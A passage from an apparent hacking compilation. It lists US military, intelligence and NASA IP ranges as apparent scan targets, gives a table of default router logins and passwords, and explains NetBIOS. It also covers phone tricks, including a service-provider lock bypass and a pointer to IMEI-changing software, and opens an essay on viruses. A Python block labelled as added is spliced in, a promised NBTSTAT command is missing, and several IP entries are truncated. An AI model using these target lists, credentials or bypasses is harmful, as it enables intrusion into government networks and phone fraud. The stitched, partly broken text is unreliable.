134.229.0.0 Navy Regional Data Automation Center

134.232.0.0 - 134.232.255.255 U.S. Army, Europe

134.233.0.0 HQ 5th Signal Command

134.235.0.0 HQ 5th Signal Command

134.240.0.0 U.S. Military Academy

136.149.0.0 Air Force Military Personnel Center

RANGE 136

136.178.0.0 NASA Research Network

136.188.0.0 - 136.197.255.255 Defense Intelligence Agency

136.207.0.0 69th Signal Battalion 74

Page 75: 6552818 Hacking Software

136.208.0.0 HQ, 5th Signal Command

136.209.0.0 HQ 5th Signal Command

136.210.0.0 HQ 5th Signal Command

136.212.0.0 HQ 5th Signal Command

136.213.0.0 HQ, 5th Signal Command

136.214.0.0 HQ, 5th Signal Command

136.215.0.0 HQ, 5th Signal Command

136.216.0.0 HQ, 5th Signal Command

136.217.0.0 HQ, 5th Signal Command

136.218.0.0 HQ, 5th Signal Command

136.219.0.0 HQ, 5th Signal Command

136.220.0.0 HQ, 5th Signal Command

136.221.0.0 HQ, 5th Signal Command

136.222.0.0 HQ, 5th Signal Command

RANGE 137

137.1.0.0 Whiteman Air Force Base

37.2.0.0 George Air Force Base

137.3.0.0 Little Rock Air Force Base \

137.4.0.0 - 137.4.255.255 437 CS/SC

137.5.0.0 Air Force Concentrator Network

137.6.0.0 Air Force Concentrator Network

137.11.0.0 HQ AFSPC/SCNNC

137.12.0.0 Air Force Concentrator Network

137.17.* National Aerospace Laboratory

137.24.0.0 Naval Surface Warfare Center

137.29.0.0 First Special Operations Command

137.67.0.0 Naval Warfare Assessment Center

137.94.* Royal Military College

137.95.* Headquarters, U.S. European Command

137.126.0.0 USAF MARS

137.127.* Army Concepts Analysis Agency

137.128.* U.S. ARMY Tank-Automotive Command

75

Page 76: 6552818 Hacking Software

137.130.0.0 Defense Information Systems Agency

137.209.0.0 Defense Information Systems Agency

137.210.0.0 Defense Information Systems Agency

137.211.0.0 Defense Information Systems Agency

137.212.0.0 Defense Information Systems Agency

137.231.0.0 HQ 5th Signal Command

137.232.0.0 Defense Information Systems Agency

137.233.0.0 Defense Information Systems Agency

137.234.0.0 Defense Information Systems Agency

137.235.0.0 Defense Information Systems Agency

137.240.0.0 Air Force Materiel Command

137.241.0.0 75 ABW

137.242.0.0 Air Force Logistics Command

137.243.0.0 77 CS/SCCN

137.244.0.0 78 CS/SCSC

137.245.0.0 Wright Patterson Air Force Base

137.246.0.0 United States Atlantic Command Joint Training

RANGE 139

39.31.0.0 20th Tactical Fighter Wing

139.32.0.0 48th Tactical Fighter Wing

139.33.0.0 36th Tactical Fighter Wing

139.34.0.0 52nd Tactical Fighter Wing

139.35.0.0 50th Tactical Fighter Wing

139.36.0.0 66th Electronic Combat Wing

139.37.0.0 26th Tactical Reconnaissance Wing |

139.38.0.0 32nd Tactical Fighter Squadron

139.40.0.0 10th Tactical Fighter Wing

139.41.0.0 39th Tactical Air Control Group

139.42.0.0 40th Tactical Air Control Group

139.43.0.0 401st Tactical Fighter Wing

139.124.* Reseau Infomratique

76

Page 77: 6552818 Hacking Software

RANGE 143

143.45.0.0 58th Signal Battalion

143.46.0.0 U.S. Army, 1141st Signal Battalion

143.68.0.0 Headquarters, USAISC

143.69.0.0 Headquarters, USAAISC

143.70.0.0 Headquarters, USAAISC

143.71.0.0 Headquarters, USAAISC

143.72.0.0 Headquarters, USAAISC

143.73.0.0 Headquarters, USAAISC

143.74.0.0 Headquarters, USAAISC

143.75.0.0 Headquarters, USAAISC

143.76.0.0 Headquarters, USAAISC

143.77.0.0 Headquarters, USAAISC

143.78.0.0 Headquarters, USAAISC

143.79.0.0 Headquarters, USAAISC

143.80.0.0 Headquarters, USAAISC

143.81.0.0 Headquarters, USAAISC

143.82.0.0 Headquarters, USAAISC

143.84.0.0 Headquarters, USAAISC

143.85.0.0 Headquarters, USAAISC

143.86.0.0 Headquarters, USAAISC

143.87.0.0 Headquarters, USAAISC

143.232.0.0 NASA Ames Research Center

RANGE 144

144.99.0.0 United States Army Information Systems Command

144.109.0.0 Army Information Systems Command

144.143.0.0 Headquarters, Third United States Army

144.144.0.0 Headquarters, Third United States Army

144.146.0.0 Commander, Army Information Systems Center

144.147.0.0 Commander, Army Information Systems Center

144.170.0.0 HQ, 5th Signal Command

144.192.0.0 United States Army Information Services Command-Campbell

144.233.0.0 Defense Intelligence Agency

77

Page 78: 6552818 Hacking Software

144.234.0.0 Defense Intelligence Agency

144.235.0.0 Defense Intelligence Agency

144.236.0.0 Defense Intelligence Agency

144.237.0.0 Defense Intelligence Agency

144.238.0.0 Defense Intelligence Agency

144.239.0.0 Defense Intelligence Agency

144.240.0.0 Defense Intelligence Agency

144.241.0.0 Defense Intelligence Agency

144.242.0.0 Defense Intelligence Agency

144.252.0.0 U.S. Army LABCOM

RANGE 146

146.17.0.0 HQ, 5th Signal Command

146.80.0.0 Defence Research Agency

146.98.0.0 HQ United States European Command

46.154.0.0 NASA/Johnson Space Center

146.165.0.0 NASA Langley Research Center

RANGE 147

147.35.0.0 HQ, 5th Signal Command

147.36.0.0 HQ, 5th Signal Command

147.37.0.0 HQ, 5th Signal Command

147.38.0.0 HQ, 5th Signal Command

147.39.0.0 HQ, 5th Signal Command

147.40.0.0 HQ, 5th Signal Command

147.42.0.0 Army CALS Project

147.103.0.0 Army Information Systems Software Center

147.104.0.0 Army Information Systems Software Center

147.159.0.0 Naval Air Warfare Center, Aircraft Division

147.168.0.0 Naval Surface Warfare Center

147.169.0.0 HQ, 5th Signal Command

147.198.0.0 Army Information Systems Command

147.199.0.0 Army Information Systems Command

47.238.0.0 Army Information Systems Command

78

Page 79: 6552818 Hacking Software

147.239.0.0 1112th Signal Battalion

147.240.0.0 US Army Tank-Automotive Command

147.242.0.0 19th Support Command

147.248.0.0 Fort Monroe DOIM

147.254.0.0 7th Communications Group

RANGE 148

148.114.0.0 NASA, Stennis Space Center

RANGE 150

150.113.0.0 1114th Signal Battalion

150.114.0.0 1114th Signal Battalion

150.125.0.0 Space and Naval Warfare Command

150.133.0.0 10th Area Support Group

150.144.0.0 NASA Goodard Space Flight Center

150.149.0.0 Army Information Systems Command

150.157.0.0 USAISC-Fort Lee

150.184.0.0 Fort Monroe DOIM

150.190.0.0 USAISC-Letterkenny

150.196.0.0 USAISC-LABCOM

RANGE 152

152.82.0.0 7th Communications Group of the Air Force

152.151.0.0 U.S. Naval Space & Naval Warfare Systems Command

152.152.0.0 NATO Headquarters

152.154.0.0 Defense Information Systems Agency

152.229.0.0 Defense MegaCenter (DMC) Denver

RANGE 153

153.21.0.0 USCENTAF/SCM

153.22.0.0 USCENTAF/SCM

153.28.0.0 USCENTAF/SCM

153.29.0.0 USCENTAF/SCM

153.30.0.0 USCENTAF/SCM

79

Page 80: 6552818 Hacking Software

153.31.0.0 Federal Bureau of Investigation

RANGE 155

155.5.0.0 1141st Signal Bn

155.6.0.0 1141st Signal Bn

155.77.0.0 PEO STAMIS

155.78.0.0 PEO STAMIS

155.79.0.0 US Army Corps of Engineers

155.80.0.0 PEO STAMIS

155.81.0.0 PEO STAMIS

155.82.0.0 PEO STAMIS

155.83.0.0 US Army Corps of Enginers

155.84.0.0 PEO STAMIS

155.85.0.0 PEO STAMIS

155.86.0.0 US Army Corps of Engineers

155.87.0.0 PEO STAMIS

155.88.0.0 PEO STAMIS

155.96.0.0 Drug Enforcement Administration

155.149.0.0 1112th Signal Battalion

155.155.0.0 HQ, 5th Signal Command \

155.178.0.0 Federal Aviation Administration

155.213.0.0 USAISC Fort Benning

155.214.0.0 Director of Information Management

155.215.0.0 USAISC-FT DRUM

155.216.0.0 TCACCIS Project Management Office

155.217.0.0 Directorate of Information Management

155.218.0.0 USAISC

155.219.0.0 DOIM/USAISC Fort Sill

155.220.0.0 USAISC-DOIM

155.221.0.0 USAISC-Ft Ord

RANGE 156

156.9.0.0 U. S. Marshals Service

80

Page 81: 6552818 Hacking Software

RANGE 158

158.1.0.0 Commander, Tooele Army Depot

58.2.0.0 USAMC Logistics Support Activity

158.3.0.0 U.S. Army TACOM

158.6.0.0 USAISC-Ft. McCoy

158.8.0.0 US Army Soldier Support Center

158.9.0.0 USAISC-CECOM

158.10.0.0 GOC

158.11.0.0 UASISC-Vint Hill

158.12.0.0 US Army Harry Diamond Laboratories

158.13.0.0 USAISC DOIM

158.14.0.0 1112th Signal Battalion

158.16.0.0 Rocky Mountain Arsenal (PMRMA)

158.17.0.0 Crane Army Ammunition Activity

158.18.0.0 Defense Finance & Accounting Service Center

158.19.0.0 DOIM

158.20.0.0 DOIM

158.235.0.0 Marine Corps Central Design and Programming Activity

158.243.0.0 Marine Corps Central Design and Programming Activity

158.244.0.0 Marine Corps Central Design and Programming Activity

158.245.0.0 Marine Corps Central Design and Programming Activity

158.246.0.0 Marine Corps Central Design and Programming Activity

RANGE 159

159.120.0.0 Naval Air Systems Command (Air 4114)

RANGE 160

160.132.0.0 US Army Recruiting Command

|160.135.0.0 36th Signal BN

160.138.0.0 USAISC

160.139.0.0 USAISC

160.140.0.0 HQ, United States Army

160.143.0.0 USAISC

81

Page 82: 6552818 Hacking Software

160.145.0.0 1101st Signal Brigade

160.146.0.0 USAISC SATCOMSTA-CAMP ROBERTS

160.150.0.0 Commander, Moncrief Army Hospital

RANGE 161

161.124.0.0 NAVAL WEAPONS STATION

RANGE 162

162.32.0.0 Naval Aviation Depot Pensacola

162.45.0.0 Central Intelligence Agency

162.46.0.0 Central Intelligence Agency |

RANGE 163

163.205.0.0 NASA Kennedy Space Center

163.206.0.0 NASA Kennedy Space Center

RANGE 164

164.45.0.0 Naval Ordnance Center, Pacific Division

164.49.0.0 United States Army Space and Strategic Defense

164.158.0.0 Naval Surface Warfare Center

164.217.0.0 Institute for Defense Analyses

164.223.0.0 Naval Undersea Warfare Center \

164.224.0.0 Secretary of the Navy

164.225.0.0 U.S. Army Intelligence and Security Command

164.226.0.0 Naval Exchange Service Command

164.227.0.0 Naval Surface Warfare Center, Crane Division

164.228.0.0 USCINCPAC J21T

164.229.0.0 NCTS-NOLA

164.230.0.0 Naval Aviation Depot

164.231.0.0 Military Sealift Command

RANGE 167

167.44.0.0 Government Telecommunications Agency

82

Page 83: 6552818 Hacking Software

RANGE 168

168.68.0.0 USDA Office of Operations

168.85.0.0 Fort Sanders Alliance

168.102.0.0 Indiana Purdue Fort Wayne

RANGE 169

169.252.0.0 - 169.253.0.0 U.S. Department of State

RANGE 195

195.10.* Various - Do not scan

RANGE 199

199.121.4.0 - 199.121.253.0 Naval Air Systems Command, VA

RANGE 203

203.59.0.0 - 203.59.255.255 Perth Australia iiNET

RANGE 205

205.0.0.0 - 205.117.255.0 Department of the Navy, Space and Naval Warfare System

Command, Washington DC - SPAWAR

205.96.* - 205.103.*

RANGE 207

207.30.* Sprint/United Telephone of Florida

Back

83

Page 84: 6552818 Hacking Software

Default Router Password


Manufacturer | Model                                              | OS Version   | Login           | Password
3Com         | -                                                  | 1.25         | root            | letmein
3Com         | Super Stack 2 Switch                               | Any          | manager         | manager
3Com         | AccessBuilder® 7000 BRI                            | Any          | -               | -
3Com         | CoreBuilder 2500                                   | -            | -               | -
3Com         | Switch 3000/3300                                   | -            | manager         | manager
3Com         | Switch 3000/3300                                   | -            | admin           | admin
3Com         | Switch 3000/3300                                   | -            | security        | security
3com         | Cable Management System SQL Database (DOSCIC DHCP) | Win2000 & MS | DOCSIS_APP      | 3com
3Com         | NAC (Network Access Card)                          | -            | adm             | none
3Com         | HiPer ARC Card                                     | v4.1.x of HA | adm             | none
3Com         | CoreBuilder 6000                                   | -            | debug           | tech
3Com         | CoreBuilder 7000                                   | -            | tech            | tech
3Com         | SuperStack II Switch 2200                          | -            | debug           | synnet
3Com         | SuperStack II Switch 2700                          | -            | tech            | tech
3Com         | SuperStack / CoreBuilder                           | -            | admin           | -
3Com         | SuperStack / CoreBuilder                           | -            | read            | -
3Com         | SuperStack / CoreBuilder                           | -            | write           | -
3Com         | LinkSwitch and CellPlex                            | -            | tech            | tech
3Com         | LinkSwitch and CellPlex                            | -            | debug           | synnet
3com         | Superstack II 3300FX                               | -            | admin           | -
3com         | Switch 3000/3300                                   | -            | Admin           | 3com
3com         | 3comCellPlex7000                                   | -            | tech            | tech
3Com         | Switch 3000/3300                                   | -            | monitor         | monitor
3Com         | AirConnect Access Point                            | n/a          | -               | comcomcom
3com         | Superstack II Dual Speed 500                       | -            | security        | security
3Com         | OfficeConnect 5x1                                  | at least 5.x | -               | PASSWORD
3Com         | SuperStack 3 Switch 3300XM                         | -            | admin           | -
3com         | Super Stack 2 Switch                               | Any          | manager         | manager
3Com         | SuperStack II Switch 1100                          | -            | manager         | manager
3Com         | SuperStack II Switch 1100                          | -            | security        | security
3com         | super stack 2 switch                               | any          | manager         | manager
3Com         | Office Connect Remote 812                          | -            | root            | !root
3Com         | Switch 3000/3300                                   | -            | admin           | admin
3COM         | OCR-812                                            | -            | root            | !root
3com         | -                                                  | -            | -               | -
3com         | NBX100                                             | 2.8          | administrator   | 0000
3com         | Home Connect                                       | -            | User            | Password
3Com         | OfficeConnect 5x1                                  | at least 5.x | estheralastruey | -
3Com         | SuperStack II Switch                               | -            | manager         | manager


Understanding NetBIOS

What is NetBIOS?

NetBIOS (Network Basic Input/Output System) was originally developed by IBM and Sytek as an Application Programming Interface (API) for client software to access LAN resources. Since its creation, NetBIOS has become the basis for many other networking applications. In its strictest sense, NetBIOS is an interface specification for accessing networking services.

NetBIOS, a layer of software developed to link a network operating system with specific hardware, was originally designed as THE network controller for IBM's Network LAN. NetBIOS has since been extended to allow programs written using the NetBIOS interface to operate on the IBM token ring architecture. NetBIOS has since been adopted as an industry standard, and now it is common to refer to NetBIOS-compatible LANs.

It offers network applications a set of "hooks" to carry out inter-application communication and data transfer. In a basic sense, NetBIOS allows applications to talk to the network. Its intention is to isolate application programs from any type of hardware dependencies. It also spares software developers the task of developing network error recovery and low-level message addressing or routing. The use of the NetBIOS interface does a lot of this work for them.

NetBIOS standardizes the interface between applications and a LAN's operating capabilities. With this, it can be specified to which levels of the OSI model the application can write, making the application transportable to other networks. In a NetBIOS LAN environment, computers are known on the system by a name. Each computer on the network has a permanent name that is programmed in various different ways. These names will be discussed in more detail below.

PCs on a NetBIOS LAN communicate either by establishing a session or by using NetBIOS datagram or broadcast methods. Sessions allow for a larger message to be sent and handle error detection and correction. The communication is on a one-to-one basis. Datagram and broadcast methods allow one computer to communicate with several other computers at the same time, but are limited in message size. There is no error detection or correction using these datagram or broadcast methods. However, datagram communication allows for communication without having to establish a session.


All communication in these environments is presented to NetBIOS in a format called Network Control Blocks (NCB). The allocation of these blocks in memory is dependent on the user program. These NCBs are divided into fields, which are reserved for input and output respectively.

NetBIOS is a very common protocol used in today's environments. NetBIOS is supported on Ethernet, Token Ring, and IBM PC Networks. In its original form, it was defined as only an interface between the application and the network adapter. Since then, transport-like functions have been added to NetBIOS, making it more functional over time.

In NetBIOS, connection-oriented (TCP) and connectionless (UDP) communication are both supported. It supports both broadcasts and multicasting, and supports three distinct services: Naming, Session, and Datagram.

NetBIOS Names

NetBIOS names are used to identify resources on a network. Applications use these names to start and end sessions. You can configure a single machine with multiple applications, each of which has a unique NetBIOS name. Each PC that supports an application also has a NetBIOS station name that is user defined or that NetBIOS derives by internal means.

A NetBIOS name can consist of up to 16 alphanumeric characters. The combination of characters must be unique within the entire source routing network. Before a PC that uses NetBIOS can fully function on a network, that PC must register its NetBIOS name.

When a client becomes active, the client advertises its name. A client is considered to be registered when it can successfully advertise itself without any other client claiming it has the same name. The steps of the registration process are as follows:

1. Upon boot up, the client broadcasts itself and its NetBIOS information anywhere from 6 to 10 times to ensure every other client on the network receives the information.

2. If another client on the network already has the name, that NetBIOS client issues its own broadcast to indicate that the name is in use. The client that is trying to register the already-in-use name stops all attempts to register that name.

3. If no other client on the network objects to the name registration, the client will finish the registration process.

There are two types of names in a NetBIOS environment: Unique and Group. A unique name must be unique across the network. A group name does not have to be unique, and all processes that have a given group name belong to the group. Each NetBIOS node maintains a table of all names currently owned by that node.

The NetBIOS naming convention allows for 16 characters in a NetBIOS name. Microsoft, however, limits these names to 15 characters and uses the 16th character as a NetBIOS suffix. A NetBIOS suffix is used by Microsoft Networking software to identify the functionality installed or the registered device or service.

[QuickNote: SMB and NBT (NetBIOS over TCP/IP) work very closely together and both use ports 137, 138 and 139. Port 137 is the NetBIOS name service (UDP). Port 138 is the NetBIOS datagram service (UDP). Port 139 is the NetBIOS session service (TCP). For further information on NetBIOS, read the paper at the rhino9 website listed above]

The following is a table of NetBIOS suffixes currently used by Microsoft Windows NT. These suffixes are displayed in hexadecimal format.

Name                 Number  Type  Usage
==========================================================================
<computername>       00      U     Workstation Service
<computername>       01      U     Messenger Service
<\\_MSBROWSE_>       01      G     Master Browser
<computername>       03      U     Messenger Service
<computername>       06      U     RAS Server Service
<computername>       1F      U     NetDDE Service
<computername>       20      U     File Server Service
<computername>       21      U     RAS Client Service
<computername>       22      U     Exchange Interchange
<computername>       23      U     Exchange Store
<computername>       24      U     Exchange Directory
<computername>       30      U     Modem Sharing Server Service
<computername>       31      U     Modem Sharing Client Service
<computername>       43      U     SMS Client Remote Control
<computername>       44      U     SMS Admin Remote Control Tool
<computername>       45      U     SMS Client Remote Chat
<computername>       46      U     SMS Client Remote Transfer
<computername>       4C      U     DEC Pathworks TCPIP Service
<computername>       52      U     DEC Pathworks TCPIP Service
<computername>       87      U     Exchange MTA
<computername>       6A      U     Exchange IMC
<computername>       BE      U     Network Monitor Agent
<computername>       BF      U     Network Monitor Apps
<username>           03      U     Messenger Service
<domain>             00      G     Domain Name
<domain>             1B      U     Domain Master Browser
<domain>             1C      G     Domain Controllers
<domain>             1D      U     Master Browser
<domain>             1E      G     Browser Service Elections
<INet~Services>      1C      G     Internet Information Server
<IS~Computer_name>   00      U     Internet Information Server
<computername>       [2B]    U     Lotus Notes Server
IRISMULTICAST        [2F]    G     Lotus Notes
IRISNAMESERVER       [33]    G     Lotus Notes
Forte_$ND800ZA       [20]    U     DCA Irmalan Gateway Service

Unique (U): The name may have only one IP address assigned to it. On a network device, multiple occurrences of a single name may appear to be registered, but the suffix will be unique, making the entire name unique.

Group (G): A normal group; the single name may exist with many IP addresses.

Multihomed (M): The name is unique, but due to multiple network interfaces on the same computer, this configuration is necessary to permit the registration. The maximum number of addresses is 25.

Internet Group (I): This is a special configuration of the group name used to manage WinNT domain names.

Domain Name (D): New in NT 4.0
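As an added illustration of the 15-character-name-plus-suffix scheme and the suffix table above (example code written for this page, not taken from the original document or from Microsoft), the following Python builds a 16-byte NetBIOS name, applies the RFC 1001 first-level encoding that carries such names in name-service packets on UDP port 137, and reads a host's registered names back into the usages the table lists. The host name FILESRV01, the domain CORP and SAMPLE_NAME_TABLE are constructed, and SUFFIX_USAGE is only a subset of the table.

```python
# Added example, not from the original document: handling NetBIOS names as
# described above (a 15-character name padded with spaces plus a one-byte
# suffix) and the RFC 1001 "first-level" encoding that carries those 16
# bytes in name-service packets on UDP port 137: each byte becomes two
# letters in the range A..P. SUFFIX_USAGE is a subset of the page's suffix
# table; SAMPLE_NAME_TABLE is a constructed example of one host's names.

# (suffix, is_group) -> usage, from the suffix table above.
SUFFIX_USAGE = {
    (0x00, False): "Workstation Service",
    (0x00, True): "Domain Name",
    (0x03, False): "Messenger Service",
    (0x1B, False): "Domain Master Browser",
    (0x1C, True): "Domain Controllers",
    (0x1D, False): "Master Browser",
    (0x1E, True): "Browser Service Elections",
    (0x20, False): "File Server Service",
}


def make_netbios_name(name, suffix):
    """16-byte NetBIOS name: upper-cased name (max 15 chars, space padded)
    followed by the suffix byte."""
    if not 0 <= suffix <= 0xFF:
        raise ValueError("suffix must be a single byte")
    raw = name.upper().encode("ascii")
    if len(raw) > 15:  # Microsoft keeps the 16th byte for the suffix
        raise ValueError("NetBIOS name part may be at most 15 characters")
    return raw.ljust(15, b" ") + bytes([suffix])


def split_netbios_name(name16):
    """Inverse of make_netbios_name: (name without padding, suffix)."""
    if len(name16) != 16:
        raise ValueError("a NetBIOS name is exactly 16 bytes")
    return name16[:15].rstrip(b" ").decode("ascii"), name16[15]


def first_level_encode(name16):
    """Each nibble becomes chr(ord('A') + nibble): 16 bytes -> 32 letters
    A..P, e.g. the space/0x20 padding encodes as 'CA'."""
    out = []
    for b in name16:
        out.append(chr(ord("A") + (b >> 4)))
        out.append(chr(ord("A") + (b & 0x0F)))
    return "".join(out)


def first_level_decode(encoded):
    """Decode 32 letters A..P back to 16 raw bytes. Anything else is
    rejected, which is the check to apply to untrusted NBNS input."""
    if len(encoded) != 32 or any(c not in "ABCDEFGHIJKLMNOP" for c in encoded):
        raise ValueError("malformed first-level encoded NetBIOS name")
    nib = [ord(c) - ord("A") for c in encoded]
    return bytes((hi << 4) | lo for hi, lo in zip(nib[0::2], nib[1::2]))


def describe_suffix(suffix, is_group):
    """Usage text for a suffix/type pair from the page's table."""
    return SUFFIX_USAGE.get((suffix, is_group), "Unknown")


# Constructed: (name, suffix, is_group) triples as a host's name table
# would list them.
SAMPLE_NAME_TABLE = [
    ("FILESRV01", 0x00, False),
    ("FILESRV01", 0x20, False),
    ("CORP", 0x00, True),
    ("CORP", 0x1C, True),
    ("CORP", 0x1B, False),
]


def summarize_name_table(entries):
    """Readable lines such as 'FILESRV01<20> UNIQUE File Server Service'."""
    lines = []
    for name, suffix, is_group in entries:
        kind = "GROUP" if is_group else "UNIQUE"
        lines.append(f"{name}<{suffix:02X}> {kind} "
                     f"{describe_suffix(suffix, is_group)}")
    return lines


def advertised_roles(entries):
    """Roles worth noticing in an inventory: a unique <20> means the host
    offers file sharing, a group <1C> marks a domain controller and a
    unique <1B> the domain master browser (all per the table above)."""
    roles = set()
    for _name, suffix, is_group in entries:
        if suffix == 0x20 and not is_group:
            roles.add("file server")
        elif suffix == 0x1C and is_group:
            roles.add("domain controller")
        elif suffix == 0x1B and not is_group:
            roles.add("domain master browser")
    return roles
```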

For a quick and dirty look at a server's registered NetBIOS names and services, issue the following NBTSTAT command:


NetBIOS Sessions

The NetBIOS session service provides a connection-oriented, reliable, full-duplex message service to a user process. NetBIOS requires one process to be the client and the other to be the server. NetBIOS session establishment requires a preordained cooperation between the two stations. One application must have issued a Listen command when another application issues a Call command. The Listen command references a name in its NetBIOS name table (or WINS server), and also the remote name an application must use to qualify as a session partner. If the receiver (listener) is not already listening, the Call will be unsuccessful. If the call is successful, each application receives notification of session establishment with the session-id. The Send and Receive commands then transfer the data. At the end of a session, either application can issue a Hang-Up command. There is no real flow control for the session service because it is assumed a LAN is fast enough to carry the required traffic.

NetBIOS Datagrams

Datagrams can be sent to a specific name, sent to all members of a group, or broadcast to the entire LAN. As with other datagram services, NetBIOS datagrams are connectionless and unreliable. The Send_Datagram command requires the caller to specify the name of the destination. If the destination is a group name, then every member of the group receives the datagram. The caller of the Receive_Datagram command must specify the local name for which it wants to receive datagrams. The Receive_Datagram command also returns the name of the sender, in addition to the actual datagram data. If NetBIOS receives a datagram, but there are no Receive_Datagram commands pending, then the datagram is discarded.

The Send_Broadcast_Datagram command sends the message to every NetBIOS system on the local network. When a broadcast datagram is received by a NetBIOS node, every process that has issued a Receive_Broadcast_Datagram command receives the datagram. If none of these commands are outstanding when the broadcast datagram is received, the datagram is discarded.

NetBIOS enables an application to establish a session with another device and lets the network redirector and transaction protocols pass a request to and from another machine. NetBIOS does not actually manipulate the data. The NetBIOS specification defines an interface to the network protocol used to reach those services, not the protocol itself. Historically, it has been paired with a network protocol called NetBEUI (network extended user interface). The association of the interface and the protocol has sometimes caused confusion, but the two are different.

Network protocols always provide at least one method for locating and connecting to a particular service on a network. This is usually accomplished by converting a node or service name to a network address (name resolution). NetBIOS service names must be resolved to an IP address before connections can be established with TCP/IP. Most NetBIOS implementations for TCP/IP accomplish name-to-address resolution by using either broadcasts or LMHOSTS files. In a Microsoft environment, you would probably also use a NetBIOS Name Server, known as WINS.

NetBEUI Explained

NetBEUI is an enhanced version of the NetBIOS protocol used by network operating systems. It formalizes the transport frame that was never standardized in NetBIOS and adds additional functions. It is the transport layer driver frequently used by Microsoft's LAN Manager. NetBEUI implements the OSI LLC2 protocol. NetBEUI is the original PC networking protocol and interface designed by IBM for the LAN Manager Server. This protocol was later adopted by Microsoft for their networking products. It specifies the way that higher-level software sends and receives messages over the NetBIOS frame protocol. This protocol runs over the standard 802.2 data-link protocol layer.

NetBIOS Scopes

A NetBIOS Scope ID provides an extended naming service for the NetBIOS over TCP/IP (known as NBT) module. The primary purpose of a NetBIOS scope ID is to isolate NetBIOS traffic on a single network to only those nodes with the same NetBIOS scope ID. The NetBIOS scope ID is a character string that is appended to the NetBIOS name. The NetBIOS scope ID on two hosts must match, or the two hosts will not be able to communicate. The NetBIOS Scope ID also allows computers to use the same computer name as long as they have different scope IDs. The Scope ID becomes a part of the NetBIOS name, making the name unique.


Mobile hacking

Nokia 2110/2110i: these codes show you the software version, software date and hardware model number of your phone.

On 2110, type:

* # 9999 #

On the 2110i, one of the following may work:

* # 170602112302 # or

* # 682371158412125 #

Show IMEI code

If you need to know the IMEI code of your phone, simply press:

* # 06 #

and you'll read it on the display.

Change IMEI code

If you want to change the IMEI code of your phone (we don't want to know "why"), here is the software you'll need.

Show manufact. date

To get the manufacturing date of your phone, press:

* # 3283 # (= *#date#)

In 1995 phones the date is in "mmyy" format; 1996 and later phones show the date in "wwyy" format.

Unlock SP lock

Here is a way to unlock a phone that is Service Provider locked, without knowing the SP lock code!

Give it a try (and give us feedback, pls):

Turn the phone on, when the phone asks for the Security Code,

press:

112

<send>

now quickly press:

#

send

end

send

end.

Each time you turn your phone OFF it resets the lock, so this needs to be done each time you turn your phone ON :-(

Anyway it's better than nothing, isn't it?

Pin-Out

ANT 16 9 Charging connector

(O) I-I-I-I-I-I-I-I ( ) ( o )

CON 8 1

The left symbol (O) is the antenna connector for car kits. The symbol numbered 16-9 on the top and 8-1 on the bottom is the system connector. The ( ) is the open space next to the connector and the ( o ) is the charging connector for your home charger.

PIN Description

1 - Digital ground

2 - External audio input from accessories or handsfree microphone.

Multiplexed with junction box connection control signal

3 - Analogue ground for accessories

4 - Transmitted DBUS data to the accessories

5 - Serial Bidirectional data between the phone and accessories

6 - Hook indication. HP has a 100KE pull-up resistor.

7 - Handsfree device power on/off, data to flash programming device.

8 - Battery charging voltage

9 - Digital ground

10 - External Audio output to accessories or handsfree speaker

11 - DBUS data bit sync clock

12 - DBUS received data from the accessories

13 - Power supply to headset adapter

14 - Programming voltage for FLASH

15 - DBUS data clock

16 - Battery charging voltage

Software Bug

Software versions prior to 5.48 may randomly reset and restart; this seems to be fixed in later versions.

For:

Motorola d460, 2500, 6200 (Flare), 7500, 8200, 8400 & 8700

IMEI

*#06# displays IMEI on 8700, NOT on 6200, 7500, 8200

To activate RBS:

(pause means the * key held in until box appears)

[pause] [pause] [pause] 1 1 3 [pause] 1 [pause] [ok]

You now have to press the [MENU] and scroll to the 'Eng Field Options' function with the

keys, and enable it.


To de-activate RBS,

[pause] [pause] [pause] 1 1 3 [pause] 0 [pause] [ok]

This only works with some versions of software. Please report what works and doesn't for

you.

Reported working, by country:

d460: IT

6200 Flare: UK (Orange), AU

7500: IT (model: F16 HW: 5.2 SW: 2.1)

8200: ES, AU, NL, BE

8400: IT, NL

8700: AU, IT, SG, DE, ES, ZA

Uses of RBS:

Distance From Base Station - Place a call, when it is answered, press [MENU] until 'Eng

Field Option' is displayed, press [OK], select 'Active Cell', press [OK], press [MENU] until

'Time Adv xxx' appears, where xxx is a number. Multiply this number by 550, and the result

is the distance from the RBS (Radio Base Station), in meters.

Signal Quality - press [MENU] until 'Eng Field Option' is displayed, press [OK], select

'Active Cell', press [OK], press [MENU] until 'C1' appears. This is the signal quality. If it

becomes negative for longer than 5 seconds, a new cell is selected.


Viruses

Index

• Introduction to Computer Viruses

• History

• Why Do People Write Viruses

• Virus Code


Introduction to Computer Viruses

A person might have a computer virus infection when the computer starts acting differently: for instance, it gets slow, or when they turn the computer on it says that all the data is erased, or when they start writing a document it looks different, some chapters might be missing, or something else abnormal has happened.

The next thing that usually happens is that the person whose computer might be infected with a virus panics. The person might think that all the work that has been done is missing. That could be true, but in most cases the virus has not done any harm yet; it is when one starts doing something without being sure what one is doing that harm can follow. When some people try to get rid of viruses they delete files, or they might even format the whole hard disk, like my cousin did. That is not the best way to act when a person thinks he has a virus infection.

What do people do when they get sick? They go to see a doctor if they do not know what is wrong with them. It is the same way with viruses: if the person does not know what to do, they call someone who knows more about viruses and get professional help.

If a person reads email on their PC, or uses diskettes to transfer files between the computer at work and the computer at home, or just transfers files between the two computers, they have a good chance of getting a virus. They might also get viruses when they download files from any internet site. There was a time when people were able to be sure that some sites were secure, that those secure sites did not have any virus problems, but nowadays people cannot be sure of anything. There have been viruses even on Microsoft's download sites.

In this report I am going to introduce different malware types, how they spread and how to deal with them. The most common viruses nowadays are macro viruses and I am going to spend a little more time on them. I am going to give an example of trojan horses stealing passwords.

Comparison with biological viruses

How viruses work

A computer virus passes from one computer to another much as a biological virus passes from person to person. For example, experts estimate that the Mydoom worm infected a quarter of a million computers in a single day in January 2004. Another example is the ILOVEYOU virus, which appeared in 2000 and had a similar effect; it borrowed most of its operating style from Melissa. There are tens of thousands of viruses out there, and new ones are discovered every day. It is difficult to come up with a generic explanation of how viruses work, since they all vary in the way they infect and the way they spread. So instead, we have taken some broad categories that are commonly used to describe the various types of virus.

Basic types of viruses

File viruses (parasitic viruses)

